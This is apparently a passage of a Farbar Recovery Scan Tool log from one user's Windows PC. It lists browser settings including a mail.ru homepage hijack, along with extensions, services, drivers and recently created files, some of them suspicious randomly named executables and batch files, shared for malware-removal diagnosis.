HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = 
HKU\S-1-5-21-2176517476-3644118065-910164434-1000\Software\Microsoft\Internet Explorer\Main,Search Page = hxxps://www.google.com/search?bcutc=sp-006&q={searchTerms}
HKU\S-1-5-21-2176517476-3644118065-910164434-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://www.google.com/?bcutc=sp-006
SearchScopes: HKLM-x32 -> DefaultScope {E9410C70-B6AE-41FF-AB71-32F4B279EA5F} URL = hxxps://www.google.com/search?bcutc=sp-006&q={searchTerms}
SearchScopes: HKLM-x32 -> {E9410C70-B6AE-41FF-AB71-32F4B279EA5F} URL = hxxps://www.google.com/search?bcutc=sp-006&q={searchTerms}
SearchScopes: HKU\S-1-5-21-2176517476-3644118065-910164434-1000 -> DefaultScope {E9410C70-B6AE-41FF-AB71-32F4B279EA5F} URL = hxxps://www.google.com/search?bcutc=sp-006&q={searchTerms}
SearchScopes: HKU\S-1-5-21-2176517476-3644118065-910164434-1000 -> {E9410C70-B6AE-41FF-AB71-32F4B279EA5F} URL = hxxps://www.google.com/search?bcutc=sp-006&q={searchTerms}
BHO: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files\Java\jre1.8.0_151\bin\ssv.dll [2017-10-17] (Oracle Corporation)
BHO: avast! Online Security -> {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} -> C:\Program Files\AVAST Software\Avast\aswWebRepIE64.dll [2017-11-16] (AVAST Software)
BHO: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre1.8.0_151\bin\jp2ssv.dll [2017-10-17] (Oracle Corporation)
BHO-x32: avast! Online Security -> {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} -> C:\Program Files\AVAST Software\Avast\aswWebRepIE.dll [2017-11-16] (AVAST Software)
 
FireFox:
========
FF DefaultProfile: aa5kqnf6.default
FF ProfilePath: C:\Users\Franco\AppData\Roaming\Mozilla\Firefox\Profiles\aa5kqnf6.default [2018-01-14]
FF Homepage: Mozilla\Firefox\Profiles\aa5kqnf6.default -> hxxps://inline.go.mail.ru/homepage?inline_comp=hp&inline_hp_cnt=11956636
FF NewTab: Mozilla\Firefox\Profiles\aa5kqnf6.default -> about:newtab
FF NewTabOverride: Mozilla\Firefox\Profiles\aa5kqnf6.default -> Enabled: homepage@mail.ru
FF Extension: (Avast SafePrice) - C:\Users\Franco\AppData\Roaming\Mozilla\Firefox\Profiles\aa5kqnf6.default\Extensions\sp@avast.com.xpi [2018-01-08]
FF Extension: (Avast Online Security) - C:\Users\Franco\AppData\Roaming\Mozilla\Firefox\Profiles\aa5kqnf6.default\Extensions\wrc@avast.com.xpi [2017-10-14]
FF Extension: (Adblock Plus) - C:\Users\Franco\AppData\Roaming\Mozilla\Firefox\Profiles\aa5kqnf6.default\Extensions\{d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d}.xpi [2017-12-12]
FF Extension: (Disable JavaScript Shared Memory) - C:\Users\Franco\AppData\Roaming\Mozilla\Firefox\Profiles\aa5kqnf6.default\features\{f2a7955a-d599-40e9-9a60-f1cef7b5b341}\disable-js-shared-memory@mozilla.org.xpi [2018-01-09] [Legacy]
FF SearchPlugin: C:\Users\Franco\AppData\Roaming\Mozilla\Firefox\Profiles\aa5kqnf6.default\searchplugins\google-avast.xml [2018-01-14]
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_28_0_0_137.dll [2018-01-14] ()
FF Plugin: @java.com/DTPlugin,version=11.151.2 -> C:\Program Files\Java\jre1.8.0_151\bin\dtplugin\npDeployJava1.dll [2017-10-17] (Oracle Corporation)
FF Plugin: @java.com/JavaPlugin,version=11.151.2 -> C:\Program Files\Java\jre1.8.0_151\bin\plugin2\npjp2.dll [2017-10-17] (Oracle Corporation)
FF Plugin: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_28_0_0_137.dll [2018-01-14] ()
FF Plugin-x32: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.33.7\npGoogleUpdate3.dll [2017-11-13] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.33.7\npGoogleUpdate3.dll [2017-11-13] (Google Inc.)
FF Plugin HKU\S-1-5-21-2176517476-3644118065-910164434-1000: @unity3d.com/UnityPlayer,version=1.0 -> C:\Users\Franco\AppData\LocalLow\Unity\WebPlayer\loader\npUnity3D32.dll [2016-05-08] (Unity Technologies ApS)
 
Chrome: 
=======
CHR HomePage: Default -> hxxp://google.com/
CHR StartupUrls: Default -> "hxxps://www.google.com/"
CHR Profile: C:\Users\Franco\AppData\Local\Google\Chrome\User Data\Default [2018-01-15]
CHR Extension: (Documentos) - C:\Users\Franco\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2017-10-12]
CHR Extension: (YouTube) - C:\Users\Franco\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2017-05-23]
CHR Extension: (Adblock Plus) - C:\Users\Franco\AppData\Local\Google\Chrome\User Data\Default\Extensions\cfhdojbkjhnklbpkdaibdccddilifddb [2017-09-27]
CHR Extension: (AdBlock) - C:\Users\Franco\AppData\Local\Google\Chrome\User Data\Default\Extensions\gighmmpiobklfepjocnamgkkbiglidom [2018-01-14]
CHR Extension: (Discord Screen Sharing) - C:\Users\Franco\AppData\Local\Google\Chrome\User Data\Default\Extensions\lcbhdgefieegnkbopmgklhlpjjdgmbog [2017-10-30]
CHR Extension: (Sistema de pagos de Chrome Web Store) - C:\Users\Franco\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2017-09-10]
CHR Extension: (Gmail) - C:\Users\Franco\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2017-05-23]
CHR Extension: (Chrome Media Router) - C:\Users\Franco\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2017-12-12]
CHR Profile: C:\Users\Franco\AppData\Local\Google\Chrome\User Data\System Profile [2018-01-14]
CHR HKLM-x32\...\Chrome\Extension: [clgckgfbhciacomhlchmgdnplmdiadbj] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [dijfnbhlogmffhgpelodglnnkncadnbi] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [eofcbnmajmjmplflapaojjnihcjkigck] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [gomekmidlodglbbmalcneegieacbdmki] - hxxps://clients2.google.com/service/update2/crx
 
==================== Services (Whitelisted) ====================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
R2 amdacpusrsvc; C:\Program Files\AMD\{920DEC42-4CA5-4d1d-9487-67BE645CDDFC}\amdacpusrsvc.exe [121856 2017-11-02] (Advanced Micro Devices) [File not signed]
R3 aswbIDSAgent; C:\Program Files\AVAST Software\Avast\x64\aswidsagenta.exe [7538536 2018-01-07] (AVAST Software)
R2 avast! Antivirus; C:\Program Files\AVAST Software\Avast\AvastSvc.exe [301168 2018-01-07] (AVAST Software)
S3 BEService; C:\Program Files (x86)\Common Files\BattlEye\BEService.exe [6971400 2017-11-28] ()
S3 Disc Soft Lite Bus Service; C:\Program Files\DAEMON Tools Lite\DiscSoftBusServiceLite.exe [1471168 2017-04-24] (Disc Soft Ltd)
S2 MBAMService; D:\Anti-Malware\mbamservice.exe [6234056 2017-11-01] (Malwarebytes)
S2 Solvusoft Suite Service; C:\Program Files (x86)\Solvusoft\SuiteService.exe [1284168 2015-11-14] (Solvusoft Corporation)
S4 SwitchBoard; C:\Program Files (x86)\Common Files\Adobe\SwitchBoard\SwitchBoard.exe [517096 2010-02-19] (Adobe Systems Incorporated) [File not signed]
R2 TeamViewer; C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe [10885360 2017-05-31] (TeamViewer GmbH)
S3 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2013-05-27] (Microsoft Corporation)
 
===================== Drivers (Whitelisted) ======================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
R2 amdacpksd; C:\Windows\system32\drivers\amdacpksd.sys [305544 2017-11-02] (Advanced Micro Devices)
S3 AsrDrv101; C:\Windows\SysWOW64\Drivers\AsrDrv101.sys [22280 2017-05-25] (ASRock Incorporation)
R1 aswArPot; C:\Windows\System32\drivers\aswArPot.sys [185096 2018-01-07] (AVAST Software)
R1 aswbidsdriver; C:\Windows\System32\drivers\aswbidsdrivera.sys [321512 2018-01-07] (AVAST Software)
R0 aswbidsh; C:\Windows\System32\drivers\aswbidsha.sys [199448 2018-01-07] (AVAST Software)
R0 aswblog; C:\Windows\System32\drivers\aswbloga.sys [343768 2018-01-07] (AVAST Software)
R0 aswbuniv; C:\Windows\System32\drivers\aswbuniva.sys [57696 2018-01-07] (AVAST Software)
R1 aswHdsKe; C:\Windows\System32\drivers\aswHdsKe.sys [149344 2018-01-07] (AVAST Software)
S3 aswHwid; C:\Windows\System32\drivers\aswHwid.sys [46976 2018-01-07] (AVAST Software)
R1 aswKbd; C:\Windows\system32\drivers\aswKbd.sys [41832 2017-09-10] (AVAST Software)
R2 aswMonFlt; C:\Windows\System32\drivers\aswMonFlt.sys [146648 2018-01-10] (AVAST Software)
R1 aswRdr; C:\Windows\System32\drivers\aswRdr2.sys [110336 2018-01-07] (AVAST Software)
R0 aswRvrt; C:\Windows\System32\drivers\aswRvrt.sys [84384 2018-01-07] (AVAST Software)
R1 aswSnx; C:\Windows\System32\drivers\aswSnx.sys [1025176 2018-01-07] (AVAST Software)
R1 aswSP; C:\Windows\System32\drivers\aswSP.sys [457896 2018-01-10] (AVAST Software)
R2 aswStm; C:\Windows\System32\drivers\aswStm.sys [204456 2018-01-07] (AVAST Software)
R0 aswVmm; C:\Windows\System32\drivers\aswVmm.sys [358672 2018-01-07] (AVAST Software)
S3 CEDRIVER60; C:\Program Files (x86)\Cheat Engine 6.7\dbk64.sys [123104 2017-05-30] ()
R3 dtlitescsibus; C:\Windows\System32\DRIVERS\dtlitescsibus.sys [30264 2017-06-04] (Disc Soft Ltd)
R3 dtliteusbbus; C:\Windows\System32\DRIVERS\dtliteusbbus.sys [47672 2017-06-04] (Disc Soft Ltd)
S3 AsrAutoChkUpdDrv; \??\C:\Windows\SysWOW64\Drivers\AsrAutoChkUpdDrv.sys [X]
 
==================== NetSvcs (Whitelisted) ===================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
 
==================== One Month Created files and folders ========
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2018-01-15 20:04 - 2018-01-15 20:04 - 000015124 _____ C:\Users\Franco\Downloads\FRST.txt
2018-01-15 20:02 - 2018-01-15 20:04 - 000000000 ____D C:\FRST
2018-01-15 19:59 - 2018-01-15 19:59 - 002393088 _____ (Farbar) C:\Users\Franco\Downloads\FRST64.exe
2018-01-15 19:59 - 2018-01-15 19:59 - 000000000 ____D C:\Windows\system32\appmgmt
2018-01-15 01:36 - 2018-01-15 01:36 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes
2018-01-15 01:35 - 2018-01-15 01:35 - 000000000 ____D C:\ProgramData\MB3CoreBackup
2018-01-14 22:38 - 2018-01-14 22:38 - 000275384 _____ C:\Windows\Minidump\011418-16239-01.dmp
2018-01-14 19:20 - 2018-01-14 19:20 - 000001167 _____ C:\Users\Franco\Desktop\TS4.exe - Acceso directo.lnk
2018-01-14 14:20 - 2018-01-14 14:20 - 000000000 ____D C:\ProgramData\SWCUTemp
2018-01-14 11:12 - 2018-01-14 11:12 - 000275384 _____ C:\Windows\Minidump\011418-16083-01.dmp
2018-01-14 02:14 - 2018-01-14 03:11 - 000000000 ____D C:\Users\Franco\Downloads\The Sims 4 [FitGirl Repack]
2018-01-14 01:50 - 2018-01-14 02:06 - 3331603898 _____ C:\Users\Franco\Downloads\TS4_Update_1-37-35-1010.rar
2018-01-14 01:33 - 2018-01-14 01:33 - 000000001 _____ C:\Users\Franco\AppData\Local\WMI.ini
2018-01-14 01:33 - 2010-11-21 00:24 - 000186368 _____ (Microsoft Corporation) C:\Users\Franco\AppData\Local\AAfuIkYhYoa.exe
2018-01-14 01:33 - 2009-07-13 22:14 - 000001034 _____ C:\Users\Franco\AppData\Roaming\YaOYcLIZDWQaa
2018-01-14 01:32 - 2018-01-14 01:42 - 000000000 ____D C:\Users\Franco\AppData\Local\Mail.Ru
2018-01-14 01:32 - 2018-01-14 01:35 - 000000000 ____D C:\ProgramData\Mail.Ru
2018-01-14 01:32 - 2018-01-14 01:32 - 000000000 ___HD C:\Windows\system32\GroupPolicy
2018-01-14 01:28 - 2018-01-14 01:28 - 000000000 ____D C:\Users\Franco\Downloads\plaza-shantae.pirate.queens.quest
2018-01-13 23:00 - 2018-01-13 23:00 - 000000222 _____ C:\Users\Franco\Desktop\No More Room in Hell.url
2018-01-13 22:56 - 2018-01-13 22:56 - 000275384 _____ C:\Windows\Minidump\011318-14788-01.dmp
2018-01-12 02:41 - 2018-01-12 14:56 - 000000000 ____D C:\Users\Franco\Documents\New Unity Project
2018-01-12 02:23 - 2018-01-12 02:23 - 010218507 _____ C:\Users\Franco\Downloads\VRCSDK-2018.01.03.12.06_Public.unitypackage
2018-01-12 02:22 - 2018-01-12 02:22 - 008621715 _____ C:\Users\Franco\Downloads\Cubeds-Unity-Shaders-master.zip
2018-01-12 02:18 - 2018-01-12 02:41 - 000000000 ____D C:\Users\Franco\AppData\LocalLow\DefaultCompany
2018-01-12 02:17 - 2018-01-12 02:40 - 000000000 ____D C:\Users\Franco\Documents\MMD import
2018-01-12 02:12 - 2018-01-14 01:36 - 000000000 ____D C:\Users\Franco\AppData\LocalLow\Unity
2018-01-12 02:12 - 2018-01-14 01:36 - 000000000 ____D C:\Users\Franco\AppData\Local\Unity
2018-01-12 02:12 - 2018-01-12 14:31 - 000000000 ____D C:\ProgramData\Unity
2018-01-12 02:12 - 2018-01-12 02:41 - 000000000 ____D C:\Users\Franco\AppData\Roaming\Unity
2018-01-12 02:12 - 2018-01-12 02:12 - 000001282 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Visual Studio Installer.lnk
2018-01-12 02:12 - 2018-01-12 02:12 - 000000000 ____D C:\Users\Franco\AppData\Roaming\vstelemetry
2018-01-12 02:12 - 2018-01-12 02:12 - 000000000 ____D C:\Users\Franco\AppData\Roaming\Visual Studio Setup
2018-01-12 02:12 - 2018-01-12 02:12 - 000000000 ____D C:\Users\Franco\AppData\Local\ServiceHub
2018-01-12 02:12 - 2018-01-12 02:12 - 000000000 ____D C:\Program Files (x86)\Microsoft Visual Studio
2018-01-12 02:07 - 2018-01-15 20:02 - 000000000 ____D C:\Program Files (x86)\GtkSharp
2018-01-12 02:06 - 2018-01-12 02:06 - 000000883 _____ C:\Users\Public\Desktop\Unity 5.6.3p1 (64-bit).lnk
2018-01-12 02:06 - 2018-01-12 02:06 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Unity 5.6.3p1 (64-bit)
2018-01-12 02:03 - 2018-01-12 02:06 - 000000000 ____D C:\Program Files\Unity
2018-01-12 01:59 - 2018-01-12 01:59 - 000736496 _____ C:\Users\Franco\Downloads\UnityDownloadAssistant-5.6.3p1.exe
2018-01-12 00:31 - 2018-01-12 00:31 - 000000000 ____D C:\Users\Franco\AppData\LocalLow\VRChat
2018-01-12 00:31 - 2018-01-12 00:31 - 000000000 ____D C:\ProgramData\.mono
2018-01-12 00:23 - 2018-01-12 00:23 - 000000222 _____ C:\Users\Franco\Desktop\VRChat.url
2018-01-11 23:34 - 2018-01-11 23:34 - 000000000 ____D C:\Users\Franco\AppData\LocalLow\Bennett Foddy
2018-01-11 23:20 - 2018-01-11 23:31 - 595872063 _____ C:\Users\Franco\Downloads\GETTING OVER IT WITH BENNET FODDY - ToplayAndrew.rar
2018-01-10 20:31 - 2018-01-10 20:31 - 000275384 _____ C:\Windows\Minidump\011018-16130-01.dmp
2018-01-07 23:22 - 2018-01-07 23:22 - 000365680 _____ (AVAST Software) C:\Windows\system32\aswBoot.exe
2018-01-07 23:22 - 2018-01-07 23:22 - 000149344 _____ (AVAST Software) C:\Windows\system32\Drivers\aswHdsKe.sys
2018-01-07 23:14 - 2018-01-07 23:17 - 000176184 _____ C:\Windows\ntbtlog.txt
2018-01-07 23:14 - 2018-01-07 23:15 - 000271768 _____ C:\Windows\Minidump\010718-17971-01.dmp
2018-01-07 21:35 - 2018-01-07 21:35 - 000000000 ____D C:\Program Files (x86)\Java
2018-01-07 21:24 - 2018-01-07 18:54 - 000000000 ____D C:\Users\Franco\AppData\Local\LogMeIn Hamachi
2018-01-07 21:21 - 2018-01-07 21:23 - 000000000 ____D C:\Users\Franco\AppData\Roaming\.minecraft
2018-01-07 15:28 - 2018-01-07 15:28 - 000000000 ____D C:\Users\Franco\AppData\LocalLow\Airship Syndicate
2018-01-07 15:03 - 2018-01-07 15:03 - 000000222 _____ C:\Users\Franco\Desktop\Battle Chasers Nightwar.url
2018-01-02 10:06 - 2018-01-02 10:07 - 000000000 ____D C:\Users\Franco\.prefs
2018-01-02 09:14 - 2018-01-02 09:14 - 000000006 _____ C:\Users\Franco\Desktop\Codigo recuperacion steam.txt
2018-01-02 07:09 - 2018-01-02 07:09 - 000000000 ____D C:\Users\Franco\AppData\Roaming\Trove
2018-01-02 04:22 - 2018-01-02 04:23 - 000000000 ____D C:\Users\Franco\AppData\Local\IdleMaster
2017-12-31 23:28 - 2017-12-31 23:28 - 000275384 _____ C:\Windows\Minidump\123117-15600-01.dmp
2017-12-31 22:24 - 2017-12-31 22:24 - 000275384 _____ C:\Windows\Minidump\123117-14742-01.dmp
2017-12-31 20:47 - 2017-12-31 20:47 - 000275384 _____ C:\Windows\Minidump\123117-19687-01.dmp
2017-12-30 04:03 - 2017-12-30 04:03 - 000275384 _____ C:\Windows\Minidump\123017-14788-01.dmp
2017-12-28 23:57 - 2017-12-28 23:57 - 000000000 ____D C:\Users\Franco\AppData\Roaming\Skype
2017-12-19 04:23 - 2017-12-28 21:43 - 000000926 _____ C:\Users\Franco\Desktop\Starbound.lnk
 
==================== One Month Modified files and folders ========
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2018-01-15 19:59 - 2017-05-23 18:45 - 000000000 ____D C:\Program Files (x86)\ATI Technologies
2018-01-15 19:58 - 2009-07-14 00:20 - 000000000 ____D C:\Windows\inf
2018-01-15 19:55 - 2017-11-12 16:32 - 000000000 ____D C:\Users\Franco\AppData\Roaming\discord
2018-01-15 19:55 - 2017-07-04 19:48 - 000000000 ____D C:\Program Files (x86)\Steam
2018-01-15 19:53 - 2017-07-23 19:35 - 000000000 ____D C:\ProgramData\Solvusoft
2018-01-15 19:53 - 2017-05-25 15:18 - 000000300 _____ C:\Windows\Tasks\DriverDoc Auto Start.job
2018-01-15 19:53 - 2009-07-14 02:08 - 000000006 ____H C:\Windows\Tasks\SA.DAT
2018-01-15 08:38 - 2009-07-14 01:45 - 000020896 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2018-01-15 08:38 - 2009-07-14 01:45 - 000020896 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2018-01-15 02:04 - 2017-06-04 21:10 - 000000000 ____D C:\Users\Franco\AppData\Local\Adobe
2018-01-15 01:42 - 2017-09-13 23:20 - 000000000 ____D C:\Program Files (x86)\Cheat Engine 6.7
2018-01-15 01:42 - 2017-06-29 23:55 - 000000000 ____D C:\Program Files (x86)\Cheat Engine 6.4
2018-01-15 01:36 - 2017-05-25 15:31 - 000000598 _____ C:\Users\Public\Desktop\Malwarebytes.lnk
2018-01-14 22:38 - 2017-12-05 10:04 - 356131893 _____ C:\Windows\MEMORY.DMP
2018-01-14 22:38 - 2017-11-25 17:06 - 000003872 _____ C:\Windows\System32\Tasks\CCleaner Update
2018-01-14 22:38 - 2017-11-25 17:06 - 000002788 _____ C:\Windows\System32\Tasks\CCleanerSkipUAC
2018-01-14 22:38 - 2017-11-19 22:29 - 000003152 _____ C:\Windows\System32\Tasks\StartCN
2018-01-14 22:38 - 2017-10-30 04:42 - 000003118 _____ C:\Windows\System32\Tasks\Microsoft_Hardware_Launch_mousekeyboardcenter_exe
2018-01-14 22:38 - 2017-10-30 04:42 - 000003092 _____ C:\Windows\System32\Tasks\Microsoft_Hardware_Launch_ipoint_exe
2018-01-14 22:38 - 2017-10-30 04:42 - 000003090 _____ C:\Windows\System32\Tasks\Microsoft_Hardware_Launch_itype_exe
2018-01-14 22:38 - 2017-06-27 22:48 - 000004498 _____ C:\Windows\System32\Tasks\Adobe Flash Player PPAPI Notifier
2018-01-14 22:38 - 2017-06-04 21:26 - 000003500 _____ C:\Windows\System32\Tasks\AdobeAAMUpdater-1.0-Porota-Franco
2018-01-14 22:38 - 2017-05-25 15:18 - 000002678 _____ C:\Windows\System32\Tasks\DriverDoc Auto Start
2018-01-14 22:38 - 2017-05-23 18:38 - 000000000 ____D C:\Windows\Minidump
2018-01-14 22:38 - 2017-05-23 18:09 - 000003896 _____ C:\Windows\System32\Tasks\SafeZone scheduled Autoupdate 1495573797
2018-01-14 22:38 - 2017-05-23 17:32 - 000003468 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskMachineUA
2018-01-14 22:38 - 2017-05-23 17:32 - 000003340 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskMachineCore
2018-01-14 22:35 - 2017-05-23 18:08 - 000000000 ____D C:\Windows\System32\Tasks\AVAST Software
2018-01-14 16:11 - 2017-05-26 02:30 - 000000000 ____D C:\Windows\SysWOW64\directx
2018-01-14 16:09 - 2017-05-26 02:30 - 000000000 ___HD C:\Windows\msdownld.tmp
2018-01-14 14:34 - 2017-05-24 13:49 - 000000000 ____D C:\Users\Franco\AppData\LocalLow\Mozilla
2018-01-14 11:14 - 2017-05-23 17:57 - 000065536 _____ C:\Windows\system32\spu_storage.bin
2018-01-14 01:41 - 2017-05-23 17:16 - 000803328 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerApp.exe
2018-01-14 01:41 - 2017-05-23 17:16 - 000144896 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerCPLApp.cpl
2018-01-14 01:41 - 2017-05-23 17:16 - 000000000 ____D C:\Windows\SysWOW64\Macromed
2018-01-14 01:41 - 2017-05-23 17:16 - 000000000 ____D C:\Windows\system32\Macromed
2018-01-13 16:33 - 2017-07-17 20:39 - 000000000 ____D C:\Users\Franco\Desktop\pics
2018-01-12 01:24 - 2017-07-17 21:51 - 000000000 ____D C:\Users\Franco\AppData\Local\ElevatedDiagnostics
2018-01-10 19:52 - 2017-05-23 18:07 - 000457896 _____ (AVAST Software) C:\Windows\system32\Drivers\aswSP.sys
2018-01-10 19:52 - 2017-05-23 18:07 - 000146648 _____ (AVAST Software) C:\Windows\system32\Drivers\aswMonFlt.sys
2018-01-09 02:46 - 2017-05-23 17:34 - 000002193 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2018-01-08 23:55 - 2017-11-12 16:32 - 000002127 _____ C:\Users\Franco\Desktop\Discord.lnk
2018-01-08 23:54 - 2017-11-12 16:32 - 000000000 ____D C:\Users\Franco\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Discord Inc
2018-01-08 23:54 - 2017-11-12 16:32 - 000000000 ____D C:\Users\Franco\AppData\Local\Discord
2018-01-07 23:22 - 2017-11-16 22:10 - 000185096 _____ (AVAST Software) C:\Windows\system32\Drivers\aswArPot.sys
2018-01-07 23:22 - 2017-05-23 18:08 - 000003914 _____ C:\Windows\System32\Tasks\Avast Emergency Update
2018-01-07 23:22 - 2017-05-23 18:07 - 001025176 _____ (AVAST Software) C:\Windows\system32\Drivers\aswSnx.sys
2018-01-07 23:22 - 2017-05-23 18:07 - 000358672 _____ (AVAST Software) C:\Windows\system32\Drivers\aswVmm.sys
2018-01-07 23:22 - 2017-05-23 18:07 - 000343768 _____ (AVAST Software) C:\Windows\system32\Drivers\aswbloga.sys
2018-01-07 23:22 - 2017-05-23 18:07 - 000321512 _____ (AVAST Software) C:\Windows\system32\Drivers\aswbidsdrivera.sys
2018-01-07 23:22 - 2017-05-23 18:07 - 000204456 _____ (AVAST Software) C:\Windows\system32\Drivers\aswStm.sys
2018-01-07 23:22 - 2017-05-23 18:07 - 000199448 _____ (AVAST Software) C:\Windows\system32\Drivers\aswbidsha.sys
2018-01-07 23:22 - 2017-05-23 18:07 - 000110336 _____ (AVAST Software) C:\Windows\system32\Drivers\aswRdr2.sys
2018-01-07 23:22 - 2017-05-23 18:07 - 000084384 _____ (AVAST Software) C:\Windows\system32\Drivers\aswRvrt.sys
2018-01-07 23:22 - 2017-05-23 18:07 - 000057696 _____ (AVAST Software) C:\Windows\system32\Drivers\aswbuniva.sys
2018-01-07 23:22 - 2017-05-23 18:07 - 000046976 _____ (AVAST Software) C:\Windows\system32\Drivers\aswHwid.sys
2018-01-07 23:20 - 2017-05-23 18:07 - 000455384 _____ (AVAST Software) C:\Windows\system32\Drivers\aswSP.sys.151537806869104
2018-01-07 23:14 - 2017-05-23 16:52 - 000000000 ____D C:\Users\Franco
2018-01-07 22:36 - 2017-07-27 21:19 - 000007606 _____ C:\Users\Franco\AppData\Local\Resmon.ResmonCfg
2018-01-07 18:54 - 2017-12-06 10:10 - 000000000 ____D C:\Program Files\Common Files\Avast Software
2018-01-07 18:54 - 2017-10-17 15:27 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java
2018-01-07 18:54 - 2017-07-16 18:50 - 000000000 ____D C:\Users\Franco\AppData\Roaming\obs-studio
2018-01-07 18:54 - 2017-07-16 07:26 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\GOG.com
2018-01-07 18:54 - 2017-06-04 21:14 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe
2018-01-07 18:54 - 2009-07-14 02:32 - 000000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Games
2018-01-07 18:54 - 2009-07-14 00:20 - 000000000 ____D C:\Windows\AppCompat
2018-01-07 18:53 - 2009-07-14 00:20 - 000000000 ____D C:\Windows\registration
2018-01-07 18:52 - 2017-10-17 15:27 - 000000000 ____D C:\Program Files\Java
2018-01-07 18:52 - 2017-07-14 06:25 - 000000000 ____D C:\ProgramData\Oracle
2018-01-05 20:31 - 2017-06-04 20:46 - 000000000 ____D C:\Users\Franco\AppData\Roaming\DAEMON Tools Lite
2018-01-04 15:03 - 2017-06-29 23:55 - 000000000 ____D C:\Users\Franco\Documents\My Cheat Tables
2017-12-30 07:00 - 2017-05-23 17:17 - 000004332 _____ C:\Windows\System32\Tasks\Adobe Flash Player Updater
2017-12-28 20:25 - 2017-10-03 11:01 - 000000000 ____D C:\Users\Franco\BrawlhallaReplays
2017-12-23 15:34 - 2009-07-14 01:45 - 004888640 _____ C:\Windows\system32\FNTCACHE.DAT
2017-12-23 09:29 - 2017-05-23 17:16 - 000059200 _____ C:\Users\Franco\AppData\Local\GDIPFONTCACHEV1.DAT
2017-12-20 20:12 - 2009-07-14 02:08 - 000032636 _____ C:\Windows\Tasks\SCHEDLGU.TXT
2017-12-16 21:49 - 2017-11-11 21:49 - 000000222 _____ C:\Users\Franco\Desktop\Battlerite.url
2017-12-16 21:46 - 2017-11-26 19:13 - 000000000 ____D C:\Program Files\Dungeon Siege II
 
==================== Files in the root of some directories =======
 
2018-01-14 01:33 - 2009-07-13 22:14 - 000001141 _____ () C:\Program Files (x86)\Common Files\OeYgZvEuU
2009-07-13 22:14 - 2009-07-13 22:14 - 000001141 _____ () C:\Program Files (x86)\Common Files\OeYgZvEuU.bat
2017-10-10 15:30 - 2017-10-10 15:30 - 000001181 _____ () C:\Users\Franco\AppData\Roaming\trace_FilterInstaller.1.txt
2017-10-10 15:30 - 2017-10-16 03:00 - 000000919 _____ () C:\Users\Franco\AppData\Roaming\trace_FilterInstaller.txt
2017-10-10 15:30 - 2017-10-16 03:00 - 000000000 _____ () C:\Users\Franco\AppData\Roaming\trace_FilterInstaller.txt-CRT.txt
2018-01-14 01:33 - 2009-07-13 22:14 - 000001034 _____ () C:\Users\Franco\AppData\Roaming\YaOYcLIZDWQaa
2009-07-13 22:14 - 2009-07-13 22:14 - 000001034 _____ () C:\Users\Franco\AppData\Roaming\YaOYcLIZDWQaa.bat
2018-01-14 01:33 - 2010-11-21 00:24 - 000186368 _____ (Microsoft Corporation) C:\Users\Franco\AppData\Local\AAfuIkYhYoa.exe
2017-07-27 21:19 - 2018-01-07 22:36 - 000007606 _____ () C:\Users\Franco\AppData\Local\Resmon.ResmonCfg
2018-01-14 01:33 - 2018-01-14 01:33 - 000000001 _____ () C:\Users\Franco\AppData\Local\WMI.ini
 
Some files in TEMP:
====================
